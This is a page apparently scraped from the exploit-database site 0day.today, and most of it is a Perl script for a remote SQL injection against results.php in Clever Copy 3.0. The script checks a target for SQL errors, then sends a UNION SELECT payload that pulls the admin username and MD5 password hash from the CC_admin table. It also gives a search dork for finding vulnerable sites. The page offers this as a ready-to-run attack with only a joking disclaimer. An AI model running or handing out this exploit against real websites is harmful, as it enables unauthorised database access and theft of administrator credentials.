0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Clever Copy 3.0 (results.php) Remote SQL Injection Exploit
========================================================== Clever Copy 3.0 (results.php) Remote SQL Injection Exploit ========================================================== #!/usr/bin/perl ###################### # #Clever Copy (results.php) Remote SQL Injection Exploit # ###################### # #Bug by: h0yt3r # #Dork: "powered by Clever Copy" # ## ### ## # #This simple Exploit will give you Admin Username and md5(Password) #Pls don't use this to crack sites :P # #Gr33tz go to: #thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the ultimate h4ck-y0u Team # use LWP::UserAgent; my $userAgent = LWP::UserAgent->new; usage(); $server = $ARGV[0]; $dir = $ARGV[1]; print"\n"; if (!$dir) { die "Read Usage!\n"; } $filename ="results.php"; my $url = "http://".$server.$dir.$filename; my $Attack= $userAgent->get($url); if ($Attack->is_success) { print "[x] Attacking ".$url."\n"; } else { print "Couldn't connect to ".$url."!"; exit; } print "[x] Vulnerable Check:"; my $check = $url."?%73%74%61%72%74%3D%30%26%73%65%61%72%63%68%74%65%72%6D%3D%43%43%4E%65%77%73%26%73%65%61%72%63%68%74%79%70%65%3D%27"; my $Attack= $userAgent->get($check); if($Attack->content =~ m/You have an error in your SQL syntax/i) { print " Vulnerable!\n"; } else { print " Not Vulnerable!"; exit; } print "[x] Injecting Black Magic\n"; my $Injection = "?start=0&searchterm=CCNews&searchtype=category union select 1,2,3,4,5,6,concat(char(104,48,121,116,51,114),username,0x3a,password,char(104,48,121,116,51,114)),8,9,10,11,12,13,14,15,16,17 from CC_admin/*"; my $Final = $url."?seiten_id=461&sprache_id=1".$Injection; my $Attack= $userAgent->get($Final); if($Attack->content =~ m/<br>h0yt3r(.*?):(.*?)h0yt3r<br>/i) { my $login = $1; my $pass = $2; print "[x] Success!\n"; print "[x] Admin Details:\n"; print " Username: ".$login."\n"; print " Password: ".$pass."\n"; } else { print"[x] Something wrong..."; exit; } sub usage() { print q { ##################################################### Clever Copy Remote SQL Injection Exploit -Written by h0yt3r- Usage: Clever_Copy.pl [Server] [Path] Sample: perl Clever_Copy.pl www.site.com /clevercopy/ ###################################################### }; } # 0day.today [2024-07-07] #